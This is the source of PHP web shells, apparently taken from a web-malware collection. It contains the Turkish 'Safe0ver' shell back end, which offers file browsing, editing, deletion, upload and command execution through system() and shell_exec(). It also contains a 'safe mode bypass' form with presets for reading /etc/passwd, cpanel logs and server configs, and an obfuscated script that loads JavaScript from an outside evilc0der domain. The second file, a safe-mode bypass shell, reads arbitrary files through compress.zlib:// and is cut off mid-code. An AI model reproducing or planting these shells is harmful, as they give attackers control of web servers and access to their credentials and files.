<form name="urlform" action="<?php echo "$SFileName?$urlAdd"; ?>" method="POST"><input type="hidden" name="cmd" value="dir">
<table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" class="silver border">
<center>&nbsp;Safe0ver-Server File Browser...&nbsp;</center>
</td>
</tr>
</table>
<br>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td class="border nobottom noright">
&nbsp;Listeliyor:&nbsp;
</td>
<td width="100%" class="border nobottom noleft">
<table width="100%" border="0" cellpadding="1" cellspacing="0">
<tr>
<td NOWRAP width="99%" align="center"><input type="text" name="dir" class="none textin" value="<?php echo $partdir ?>"></td>
<td NOWRAP><center>&nbsp;<a href="javascript: urlform.submit();"><b>GiT<b></a>&nbsp;<center></td>
</tr>
</table>
</td>
</tr>
</table>
<!-- </form> -->
<table NOWRAP width="100%" border="0" cellpadding="0" cellspacing="0" >
<tr>
<td width="100%" NOWRAP class="silver border">
&nbsp;Dosya Adi&nbsp;
</td>
<td NOWRAP class="silver border noleft">
&nbsp;Yapilabilecekler&nbsp;&nbsp;
</td>
<td NOWRAP class="silver border noleft">
&nbsp;Boyut&nbsp;
</td>
<td width=1 NOWRAP class="silver border noleft">
&nbsp;Yetkiler&nbsp;
</td>
<td NOWRAP class="silver border noleft">
&nbsp;Son Düzenleme&nbsp;
</td>
<tr>
<?php
/* <!-- This whole heap of junk is the sorting section... */
$dirn = array();
$filen = array();
$filesizes = 0;
while ($buf = readdir($h)) {
if (is_dir("$dir/$buf"))
$dirn[] = $buf;
else
$filen[] = $buf;
}
$dirno = count($dirn) + 1;
$fileno = count($filen) + 1;
function mycmp($a, $b){
if ($a == $b) return 0;
return (strtolower($a) < strtolower($b)) ? -1 : 1;
}
if (function_exists("usort")) {
usort($dirn, "mycmp");
usort($filen, "mycmp");
}
else {
sort ($dirn);
sort ($filen);
}
reset ($dirn);
reset ($filen);
if (function_exists('array_merge')) {
$filelist = array_merge ($dirn, $filen);
}
else {
$filelist = $dirn + $filen;
}
if ( count($filelist)-1 > $Pmax ) {
$from = $Pidx * $Pmax;
$to = ($Pidx + 1) * $Pmax-1;
if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 )
$to = count($filelist) - 1;
if ($to > count($filelist)-1)
$to = count($filelist)-1;
$Dcontents = array();
For ($Fi = $from; $Fi <= $to; $Fi++) {
$Dcontents[] = $filelist[$Fi];
}
}
else {
$Dcontents = $filelist;
}
$tdcolors = array("lighttd", "darktd");
while (list ($key, $file) = each ($Dcontents)) {
if (!$tdcolor=arrval(each($tdcolors))) {
reset($tdcolors);
$tdcolor = arrval(each($tdcolors)); }
if (is_dir("$dir/$file")) { /* <!-- If it's a Directory --> */
/* <!-- Dirname --> */
echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."</td>\n";
/* <!-- Actions --> */
echo "<td NOWRAP class=\"top right $tdcolor\"><center>".sp(2)."\n";
/* <!-- Rename --> */
if ( ($file != ".") && ($file != "..") )
echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
/* <!-- Delete --> */
if ( ($file != ".") && ($file != "..") )
echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
/* <!-- End of Actions --> */
echo "&nbsp;&nbsp;</center></td>\n";
/* <!-- Size --> */
echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;</td>\n";
/* <!-- Attributes --> */
echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
echo "<strong>D</strong>";
if ( @is_readable("$dir/$file") ) {
echo "<strong>R</strong>";
}
if (function_exists('is_writeable')) {
if ( @is_writeable("$dir/$file") ) {
echo "<strong>W</stong>";
}
}
else {
echo "<strong>(W)</stong>";
}
if ( @is_executable("$dir/$file") ) {
echo "<Strong>X<strong>";
}
echo "&nbsp;&nbsp;</td>\n";
/* <!-- Date --> */
echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
echo "</td>";
echo "</tr>\n";
}
else { /* <!-- Then it must be a File... --> */
/* <!-- Filename --> */
if ( @is_readable("$dir/$file") )
echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."</td>\n";
else
echo "<tr><td NOWRAP class=\"top left right $tdcolor\">".sp(3).$file.sp(9)."</td>\n";
/* <!-- Actions --> */
echo "<td NOWRAP class=\"top right $tdcolor\"><center>&nbsp;&nbsp;\n";
/* <!-- Rename --> */
echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n";
/* <!-- Edit --> */
if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n";
/* <!-- Copy --> */
echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n";
/* <!-- Move --> */
if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) )
echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n";
/* <!-- Delete --> */
echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n";
/* <!-- Download --> */
echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n";
/* <!-- Execute --> */
if ( @is_executable("$dir/$file") )
echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n";
/* <!-- End of Actions --> */
echo sp(2)."</center></td>\n";
/* <!-- Size --> */
echo "<td NOWRAP align=\"right\" class=\"top right $tdcolor\" NOWRAP >\n";
$size = @filesize("$dir/$file");
If ($size != false) {
$filesizes += $size;
echo "&nbsp;&nbsp;<strong>".formatsize($size)."<strong>";
}
else
echo "&nbsp;&nbsp;<strong>0 B<strong>";
echo "&nbsp;&nbsp;</td>\n";
/* <!-- Attributes --> */
echo "<td NOWRAP class=\"top right $tdcolor\">&nbsp;&nbsp;\n";
if ( @is_readable("$dir/$file") )
echo "<strong>R</strong>";
if ( @is_writeable("$dir/$file") )
echo "<strong>W</stong>";
if ( @is_executable("$dir/$file") )
echo "<Strong>X<strong>";
if (function_exists('is_uploaded_file')){
if ( @is_uploaded_file("$dir/$file") )
echo "<Strong>U<strong>";
}
else {
echo "<Strong>(U)<strong>";
}
echo "&nbsp;&nbsp;</td>\n";
/* <!-- Date --> */
echo "<td NOWRAP class=\"top right $tdcolor\" NOWRAP>\n";
echo "&nbsp;&nbsp;".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."&nbsp;&nbsp;";
echo "</td>";
echo "</tr>\n";
}
}
echo "</table><table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr>\n<td NOWRAP width=100% class=\"silver border noright\">\n";
echo "&nbsp;&nbsp;".@count ($dirn)."&nbsp;Klasör,&nbsp;".@count ($filen)."&nbsp;Dosya&nbsp;&nbsp;\n";
echo "</td><td NOWRAP class=\"silver border noleft\">\n";
echo "&nbsp;&nbsp;Toplam Dosya Boyutu:&nbsp;".formatsize($filesizes)."&nbsp;&nbsp;<td></tr>\n";
function printpagelink($a, $b, $link = ""){
if ($link != "")
echo "<A HREF=\"$link\"><b>| $a - $b |</b></A>";
else
echo "<b>| $a - $b |</b>";
}
if ( count($filelist)-1 > $Pmax ) {
echo "<tr><td colspan=\"2\" class=\"silver border notop\"><table width=\"100%\" cellspacing=\"0\" cellpadding=\"3\"><tr><td valign=\"top\"><font color=\"red\"><b>Page:</b></font></td><td width=\"100%\"><center>";
$Fi = 0;
while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) {
$from = $Fi*$Pmax;
while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++;
$to = ($Fi + 1) * $Pmax - 1;
if ($Fi == $Pidx)
$link="";
else
$link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
echo "&nbsp;&nbsp;&nbsp;";
$Fi++;
}
$from = $Fi*$Pmax;
while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++;
$to = count($filelist)-1;
if ($Fi == $Pidx)
$link="";
else
$link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi";
printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link);
echo "</center></td></tr></table></td></tr>";
}
echo "</table>\n<br><table NOWRAP>";
if ($isGoodver) {
echo "<tr><td class=\"silver border\">&nbsp;<strong>PHP Versiyonu:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer&nbsp;</td></tr>\n";
}
else {
echo "<tr><td class=\"silver border\">&nbsp;<strong>Server's PHP Version:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PHPVer (Some functions might be unavailable...)&nbsp;</td></tr>\n";
}
/* <!-- Other Actions --> */
echo "<tr><td class=\"silver border\">&nbsp;<strong>Diger Islemler:&nbsp;&nbsp;</strong>&nbsp;</td>\n";
echo "<td>&nbsp;<b>".buildUrl( "| Yeni Dosya |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3).
buildUrl( "| Yeni Klasör |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3).
buildUrl( "| Dosya Yükle |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "</b>\n</td></tr>\n";
echo "<tr><td class=\"silver border\">&nbsp;<strong>Script Location:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$PATH_TRANSLATED</td></tr>\n";
echo "<tr><td class=\"silver border\">&nbsp;<strong>IP Adresin:&nbsp;&nbsp;</strong>&nbsp;</td><td>&nbsp;$REMOTE_ADDR&nbsp;</td></tr>\n";
echo "<tr><td class=\"silver border\">&nbsp;<strong>Bulundugun Klasör:&nbsp;&nbsp;</strong></td><td>&nbsp;$partdir&nbsp;</td></tr>\n";
echo "<tr><td valign=\"top\" class=\"silver border\">&nbsp;<strong>Semboller:&nbsp;&nbsp;</strong&nbsp;</td><td>\n";
echo "<table NOWRAP>";
echo "<tr><td><strong>D:</strong></td><td>&nbsp;&nbsp;Klasör.</td></tr>\n";
echo "<tr><td><strong>R:</strong></td><td>&nbsp;&nbsp;Okunabilir.</td></tr>\n";
echo "<tr><td><strong>W:</strong></td><td>&nbsp;&nbsp;Yazilabilir.</td></tr>\n";
echo "<tr><td><strong>X:</strong></td><td>&nbsp;&nbsp;Komut Calistirilabilir.</td></tr>\n";
echo "<tr><td><strong>U:</strong></td><td>&nbsp;&nbsp;HTTP Uploaded File.</td></tr>\n";
echo "</table></td>";
echo "</table>";
echo "<br>";
@closedir($h);
}
elseif ( $cmd=="execute" ) {/*<!-- Execute the executable -->*/
echo system("$file");
}
elseif ( $cmd=="deldir" ) { /*<!-- Delete a directory and all it's files --> */
echo "<center><table><tr><td NOWRAP>" ;
if ($auth == "yes") {
if (Mydeldir($file)==false) {
echo "Could not remove \"$file\"<br>Permission denied, or directory not empty...";
}
else {
echo "Successfully removed \"$file\"<br>";
}
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form>";
}
else {
echo "Are you sure you want to delete \"$file\" and all it's subdirectories ?
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"deldir\">
<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
<input type=\"hidden\" name=\"file\" value=\"$file\">
<input type=\"hidden\" name=\"auth\" value=\"yes\">
<input type=\"submit\" value=\"Yes\"></form>
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
}
echo "</td></tr></center>";
}
elseif ( $cmd=="delfile" ) { /*<!-- Delete a file --> */ echo "<center><table><tr><td NOWRAP>" ;
if ($auth == "yes") {
if (@unlink($file)==false) {
echo "Could not remove \"$file\"<br>";
}
else {
echo "Successfully removed \"$file\"<br>";
}
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form>";
}
else {
echo "Are you sure you want to delete \"$file\" ?
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"delfile\">
<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">
<input type=\"hidden\" name=\"file\" value=\"$file\">
<input type=\"hidden\" name=\"auth\" value=\"yes\">
<input type=\"submit\" value=\"Yes\"></form>
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
<input tabindex=\"0\" type=\"submit\" value=\"NO!\"></form>";
}
echo "</td></tr></center>";
}
elseif ( $cmd=="newfile" ) { /*<!-- Create new file with default name --> */
echo "<center><table><tr><td NOWRAP>";
$i = 1;
while (file_exists("$lastdir/newfile$i.txt"))
$i++;
$file = fopen("$lastdir/newfile$i.txt", "w+");
if ($file == false)
echo "Could not create the new file...<br>";
else
echo "Successfully created: \"$lastdir/newfile$i.txt\"<br>";
echo "
<form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
<input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\">
</form></center>
</td></tr></table></center> ";
}
elseif ( $cmd=="newdir" ) { /*<!-- Create new directory with default name --> */
echo "<center><table><tr><td NOWRAP>" ;
$i = 1;
while (is_dir("$lastdir/newdir$i"))
$i++;
$file = mkdir("$lastdir/newdir$i", 0777);
if ($file == false)
echo "Could not create the new directory...<br>";
else
echo "Successfully created: \"$lastdir/newdir$i\"<br>";
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\">
<input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\">
<input type=\"hidden\" name=\"dir\" value=\"$lastdir\">
<input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\">
</form></center></td></tr></table></center>";
}
elseif ( $cmd=="edit" ) { /*<!-- Edit a file and save it afterwards with the saveedit block. --> */
$contents = "";
$fc = @file( $file );
while ( @list( $ln, $line ) = each( $fc ) ) {
$contents .= htmlentities( $line ) ;
}
echo "<br><center><table><tr><td NOWRAP>";
echo "M<form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
echo "<input type=\"hidden\" name=\"cmd\" value=\"saveedit\">\n";
echo "<strong>EDIT FILE: </strong>$file<br>\n";
echo "<textarea rows=\"25\" cols=\"95\" name=\"contents\">$contents</textarea><br>\n";
echo "<input size=\"50\" type=\"text\" name=\"file\" value=\"$file\">\n";
echo "<input type=\"submit\" value=\"Save\">";
echo "</form>";
echo "</td></tr></table></center>";
}
elseif ( $cmd=="saveedit" ) { /*<!-- Save the edited file back to a file --> */
$fo = fopen($file, "w");
$wrret = fwrite($fo, stripslashes($contents));
$clret = fclose($fo);
}
elseif ( $cmd=="downl" ) { /*<!-- Save the edited file back to a file --> */
$downloadfile = urldecode($file);
if (function_exists("basename"))
$downloadto = basename ($downloadfile);
else
$downloadto = "download.ext";
if (!file_exists("$downloadfile"))
echo "The file does not exist";
else {
$size = @filesize("$downloadfile");
if ($size != false) {
$add="; size=$size";
}
else {
$add="";
}
header("Content-Type: application/download");
header("Content-Disposition: attachment; filename=$downloadto$add");
$fp=fopen("$downloadfile" ,"rb");
fpassthru($fp);
flush();
}
}
elseif ( $cmd=="upload" ) { /* <!-- Upload File form --> */
?>
<center>
<table>
<tr>
<td NOWRAP>
Dosya Yükleme Sekmesine Tikladiniz !
<br> Eger Yüklemek istediginiz Dosya mevcut ise üzerine Yazilir.<br><br>
<form enctype="multipart/form-data" action="<?php echo "$SFileName?$urlAdd" ?>" method="post">
<input type="hidden" name="MAX_FILE_SIZE" value="1099511627776">
<input type="hidden" name="cmd" value="uploadproc">
<input type="hidden" name="dir" value="<?php echo $dir ?>">
<input type="hidden" name="lastcmd" value="<?php echo $lastcmd ?>">
<input type="hidden" name="lastdir" value="<?php echo $lastdir ?>">
Dosya Yükle:<br>
<input size="75" name="userfile" type="file"><br>
<input type="submit" value="Yükle">
</form>
<br>
<form action="<?php echo "$SFileName?$urlAdd" ?>" method="POST">
<input type="hidden" name="cmd" value="<?php echo $lastcmd ?>">
<input type="hidden" name="dir" value="<?php echo $lastdir ?>">
<input tabindex="0" type="submit" value="Iptal">
</form>
</td>
</tr>
</table>
</center>
<?php
}
elseif ( $cmd=="uploadproc" ) { /* <!-- Process Uploaded file --> */
echo "<center><table><tr><td NOWRAP>";
if (file_exists($userfile))
$res = copy($userfile, "$dir/$userfile_name");
echo "Uploaded \"$userfile_name\" to \"$userfile\"; <br>\n";
if ($res) {
echo "Basariyla Yüklendi \"$userfile\" to \"$dir/$userfile_name\".\n<br><br>";
echo "Yüklenen Dosya Adi: \"$userfile_name\".\n<br>Dosya Adi: \"$userfile\".\n<br>";
echo "Dosya Boyutu: ".formatsize($userfile_size).".\n<br>Filetype: $userfile_type.\n<br>";
}
else {
echo "Yüklenemedi...";
}
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form></center>" ;
echo "<br><br></td></tr></table></center>";
}
elseif ( $cmd=="file" ) { /* <!-- View a file in text --> */
echo "<hr>";
$fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) {
echo spacetonbsp(@htmlentities($line))."<br>\n";
}
echo "<hr>";
}
elseif ( $cmd=="ren" ) { /* <!-- File and Directory Rename --> */
if (function_exists('is_dir')) {
if (is_dir("$oldfile")) {
$objname = "Directory";
$objident = "Directory";
}
else {
$objname = "Filename";
$objident = "file";
}
}
echo "<table width=100% border=\"0\" cellpadding=\"0\" cellspacing=\"0\"><tr><td width=100% style=\"class=\"silver border\"><center>&nbsp;Rename a file:&nbsp;</center></td></tr></table><br>\n";
If (empty($newfile) != true) {
echo "<center>";
$return = @rename($oldfile, "$olddir$newfile");
if ($return) {
echo "$objident renamed successfully:<br><br>Old $objname: \"$oldfile\".<br>New $objname: \"$olddir$newfile\"";
}
else {
if ( @file_exists("$olddir$newfile") ) {
echo "Error: The $objident does already exist...<br><br>\"$olddir$newfile\"<br><br>Hit your browser's back to try again...";
}
else {
echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it.";
}
}
echo "<form action=\"$SFileName?$urlAdd\" method=\"POST\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input tabindex=\"0\" type=\"submit\" value=\"Safe0ver'a Dön\"></form></center>" ;
}
else {
$dpos = strrpos($oldfile, "/");
if (strval($dpos)!="") {
$olddir = substr($oldfile, 0, $dpos+1);
}
else {
$olddir = "$lastdir/";
}
$fpos = strrpos($oldfile, "/");
if (strval($fpos)!="") {
$inputfile = substr($oldfile, $fpos+1);
}
else {
$inputfile = "";
}
echo "<center><table><tr><td><form action=\"$SFileName?$urlAdd\" method=\"post\">\n";
echo "<input type=\"hidden\" name=\"cmd\" value=\"ren\">\n";
echo "<input type=\"hidden\" name=\"oldfile\" value=\"$oldfile\">\n";
echo "<input type=\"hidden\" name=\"olddir\" value=\"$olddir\">\n";
echo "<input type=\"hidden\" name=\"lastcmd\" value=\"$lastcmd\">\n";
echo "<input type=\"hidden\" name=\"lastdir\" value=\"$lastdir\">\n";
echo "Rename \"$oldfile\" to:<br>\n";
echo "<input size=\"100\" type=\"text\" name=\"newfile\" value=\"$inputfile\"><br><input type=\"submit\" value=\"Rename\">";
echo "</form><form action=\"$SFileName?$urlAdd\" method=\"post\"><input type=\"hidden\" name=\"cmd\" value=\"$lastcmd\"><input type=\"hidden\" name=\"dir\" value=\"$lastdir\"><input type=\"submit\" value=\"Cancel\"></form>";
echo "</td></tr></table></center>";
}
}
else if ( $cmd == "con") {
?>
<center>
<table>
<tr><td>&nbsp;</td>
</tr></table>
<?php
}
else { /* <!-- There is a incorrect or no parameter specified... Let's open the main menu --> */
$isMainMenu = true;
?>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" class="border">
<center>&nbsp;-<[{ <?php echo $scriptTitle ?> Main Menu }]>-&nbsp;</center>
</td>
</tr>
</table>
<br>
<center>
<table border="0" NOWRAP>
<tr>
<td valign="top" class="silver border">
<?php echo buildUrl( sp(2)."<font color=\"navy\"><strong>##Safe0ver##</strong></font>", "cmd=dir&dir=.").sp(2); ?> </td>
<td style="BORDER-TOP: silver 1px solid;" width=350 NOWRAP><span class="style5"> Safe0ver Shell Piyasada Bulunan Bir Cok Shell'in Kodlarindan(c99,r57 vs...) Sentezlenerek Kodlanmistir.Entegre Olarak Bypass Özelligi Eklenmis Ve Böylece Tahrip Gücü Yükseltilmistir.Yazilimimiz Hic bir Virus,worm,trojan gibi Kullaniciyi Tehdit Eden Veya Sömüren yazilimlar Icermemektedir.<p>--------------------------<p>Bypass Kullaným:<b>Cat /home/evilc0der/public_html/config.php</b> Gibi Olmalidir.<br>
</span></td>
</tr>
</table>
<br><p><br>Safe Mode ByPAss<p><form method="POST">
<p align="center"><input type="text" size="40" value="<? if($_POST['dizin'] != "") { echo $_POST['dizin']; } else echo $klasor;?>" name="dizin">
<input type="submit" value="Çalistir"></p>
</form>
<form method="POST">
<p align="center"><select size="1" name="dizin">
<option value="uname -a;id;pwd;hostname">Sistem Bilgisi</option>
<option value="cat /etc/passwd">cat /etc/passwd</option>
<option value="cat /var/cpanel/accounting.log">cat /var/cpanel/accounting.log</option>
<option value="cat /etc/syslog.conf">cat /etc/syslog.conf</option>
<option value="cat /etc/hosts">cat /etc/hosts</option>
<option value="cat /etc/named.conf">cat /etc/named.conf</option>
<option value="cat /etc/httpd/conf/httpd.conf">cat /etc/httpd/conf/httpd.conf</option>
<option value="netstat -an | grep -i listen">Açik Portlar</option>
<option value="ps -aux">Çalisan Uygulamalar</option>
</select> <input type="submit" value="Çalistir"></p>
</form>
------------------------------------------------------------------------------------<p>
<?
$evilc0der=$_POST['dizin'];
if($_POST['dizin'])
{
ini_restore("safe_mode");
ini_restore("open_basedir");
$safemodgec = shell_exec($evilc0der);
echo "<textarea rows=17 cols=85>$safemodgec</textarea>";
}
?>
<Script Language='Javascript'>
<!-- HTML Encryption provided by iWEBTOOL.com -->
<!--
document.write(unescape('%3C%68%74%6D%6C%3E%3C%62%6F%64%79%3E%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%65%76%69%6C%63%30%64%65%72%2E%6F%72%67%2F%6C%6F%67%7A%2F%79%61%7A%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E%3C%2F%62%6F%64%79%3E%3C%2F%68%74%6D%6C%3E'));
//-->
</Script>
</center>
<br>
<?php
}
if ($cmd != "downl") {
if ( $isMainMenu != true) {
?>
<table width="100%" border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" style="class="silver border">
<center><strong>
&nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;Main Menu&nbsp;] </font>", "cmd=&dir="); ?>&nbsp;&nbsp;
&nbsp;&nbsp;&nbsp;&nbsp;
&nbsp;&nbsp;<?php echo buildUrl("<font color=\"navy\">[&nbsp;R00T&nbsp;] </font>", "cmd=dir&dir=."); ?> &nbsp;&nbsp;
</strong></center>
</td>
</tr>
</table>
<br>
<?php
}
?>
<table width=100% border="0" cellpadding="0" cellspacing="0">
<tr>
<td width="100%" class="silver border">
<center>&nbsp;<?php echo $scriptident ?> - <?php echo $scriptver ?> - <?php echo $scriptdate ?>&nbsp;</center>
</td>
</tr>
</table>
</td>
</tr>
</table>
<?php
}
?>

89
web-malware-collection-13-06-2012/PHP/Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2.php Normal file
View file

@ -0,0 +1,89 @@
<head>
<meta http-equiv="Content-Language" content="en-us">
</head>
<STYLE>TD { FONT-SIZE: 8pt; COLOR: #ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style>
<p align="center"><b><font face="Webdings" size="6" color="#FF0000">!</font><font face="Verdana" size="5" color="#DADADA"><a href="? "><span style="color: #DADADA; text-decoration: none; font-weight:700"><font face="Times New Roman">Safe
Mode Shell v1.0</font></span></a></font><font face="Webdings" size="6" color="#FF0000">!</font></b></p>
<form method="POST">
<p align="center"><input type="text" name="file" size="20">
<input type="submit" value="Open" name="B1"></p>
</form>
<form method="POST">
<p align="center"><select size="1" name="file">
<option value="/etc/passwd">Get /etc/passwd</option>
<option value="/var/cpanel/accounting.log">View cpanel logs</option>
<option value="/etc/syslog.conf">Syslog configuration</option>
<option value="/etc/hosts">Hosts</option>
</select> <input type="submit" value="Go" name="B1"></p>
</form>
<?php
/*
Safe_Mode Bypass PHP 4.4.2 and PHP 5.1.2
by PHP Emperor<xb5@hotmail.com>
*/
echo "<head><title>Safe Mode Shell</title></head>";
$tymczas="./"; // Set $tymczas to dir where you have 777 like /var/tmp
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = true;
$hsafemode = "<font color=\"red\">ON (secure)</font>";
}
else {$safemode = false; $hsafemode = "<font color=\"green\">OFF (not secure)</font>";}
echo("Safe-mode: $hsafemode");
$v = @ini_get("open_basedir");
if ($v or strtolower($v) == "on") {$openbasedir = true; $hopenbasedir = "<font color=\"red\">".$v."</font>";}
else {$openbasedir = false; $hopenbasedir = "<font color=\"green\">OFF (not secure)</font>";}
echo("<br>");
echo("Open base dir: $hopenbasedir");
echo("<br>");
echo "Disable functions : <b>";
if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";}
$free = @diskfreespace($dir);
if (!$free) {$free = 0;}
$all = @disk_total_space($dir);
if (!$all) {$all = 0;}
$used = $all-$free;
$used_percent = @round(100/($all/$free),2);
echo "<PRE>\n";
if(empty($file)){
if(empty($_GET['file'])){
if(empty($_POST['file'])){
die("\nWelcome.. By This script you can jump in the (Safe Mode=ON) .. Enjoy\n <B><CENTER><FONT
COLOR=\"RED\">PHP Emperor
xb5@hotmail.com</FONT></CENTER></B>");
} else {
$file=$_POST['file'];
}
} else {
$file=$_GET['file'];
}
}
$temp=tempnam($tymczas, "cx");
if(copy("compress.zlib://".$file, $temp)){
$zrodlo = fopen($temp, "r");
